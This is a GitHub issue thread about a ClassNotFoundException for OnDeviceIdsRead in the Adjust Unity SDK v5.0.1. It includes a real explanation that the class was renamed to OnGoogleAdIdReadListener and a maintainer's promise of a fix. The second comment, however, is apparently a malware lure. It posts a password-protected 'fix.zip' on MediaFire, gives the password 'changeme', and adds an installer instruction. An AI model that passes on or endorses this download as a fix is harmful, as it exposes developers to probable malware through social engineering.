### ISSUE TITLE
AndroidJavaException: java.lang.ClassNotFoundException: com.adjust.sdk.OnDeviceIdsRead Adjust v5.0.1

### ISSUE THREAD

**Issue by mrerenimo** [adjust/unity_sdk#305]
I'm using Adjust v5.0.1 
Gradle 7.5.1

When I build and run the project on my phone. I get this error:

![image](https://github.com/user-attachments/assets/15d07066-1c22-4bbb-9ea7-9dd32284f7ce)

Adjust works fine but  Android classes doesn't seem to be worked. I tried force resolve, re-install adjust, proguard, minify but doesn't work for me.  Everything works fine except adjust. I just want to get id by using 'AdjustAndroid.GetGoogleAdId(HandleGoogleAdId);'

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrerenimo** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

What is it?

**Comment by TeorikDeli** [comment]
Well, I think `OnDeviceIdsRead` is replaced with `OnGoogleAdIdReadListener` in the 5.0.0 stable release. 5.0.0 beta versions have `OnDeviceIdsRead` class; bur stable releases doesn't. [In the documentation of v5](https://dev.adjust.com/en/sdk/unity/features/device-info?version=v5#google-play-services-advertising-id) it says that `Adjust.GetGoogleAdid(callback);` but this is also wrong, `AdjustAndroid.GetGoogleAdId(callback);` is correct. And also, you have to update AdjustAndroid.cs:964 from `base("com.adjust.sdk.OnDeviceIdsRead")` to `base("com.adjust.sdk.OnGoogleAdIdReadListener")`.

I don't know who to tag for this bug, this is a serious bug.

**Comment by uerceg** [comment]
Hey guys,

Thanks for reporting, we're on it. I'll keep you posted, but you can expect 5.0.2 update with the fix for this during the day.

**Comment by uerceg** [comment]
Thank you for the confirmation and the report. Cheers!
